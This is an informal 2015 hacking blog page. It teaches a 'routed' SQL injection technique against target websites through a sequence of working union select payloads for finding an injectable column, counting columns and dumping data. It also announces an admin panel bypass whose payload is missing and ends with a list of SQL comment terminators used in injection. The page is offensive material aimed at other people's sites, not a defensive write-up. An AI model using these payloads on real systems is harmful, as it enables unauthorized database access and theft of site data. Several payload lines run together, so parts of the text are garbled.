Wednesday, November 4, 2015

Routed SQLi Method

Hey Guys ! Hope You all are fine today :p

Now I'm going to teach you SQLi Routed Query method.

So, Let's start.

First we've to find vuln columns of target website .' union select 1,2,3,4,5--+

Sadly No Vuln Columns is appearing :\

Let's check in source

view-source:' union select 1,2,3,4,5--+

:( Again no vuln columns is appearing. :) So, it's time to use Routed Query method to dump vuln column.

Let's find vuln column in which we can use routed SQLi method.

To find vuln columns. We'll use 0x27 = '' union select 1,2,3,4,0x27--+ > No error' union select 1,2,3,0x27,5--+ > No error' union select 1,2,0x27,4,5--+ > No error' union select 1,0x27,3,4,5--+ > Error' union select 0x27,2,3,4,5--+ > No Error

Horray ! :D .. We've fine the Vuln columns and it is 2.
Now , we've to use Routed SQLi Query

In this query we've to first put and false before union select & "1" in vuln column where " is for query and 1 is the injection point
Hope You know that Query without injection point never works. So, Let's begin

Time to find Columns' and false union select 1,"1 order by 1",3,4,5--+ > No error' and false union select 1,"1 order by 2",3,4,5--+ > No error' and false union select 1,"1 order by 5",3,4,5--+ > No error' and false union select 1,"1 order by 6",3,4,5--+ > Error

So, Columns are 6 :D

Let's dump vuln columns' and false union select 1,"1 union select 1,2,3,4,5,6",3,4,5--+

:D yeaahhhhhhhh... Vuln columns is appearing.

Hope You like my tutorial ;)

Admin Panel Bypass

:) Hello Guys ! Today I'm going to teach you admin panel bypass.

So, let's start

:D You can bypass 68% Admin Panels with this


If this not working You can try SQLi authentication bypass in other tutorials.
Hope You like my tutorial ;)

SQLi Comments


1 --
1' --+
1' --+-
1' ;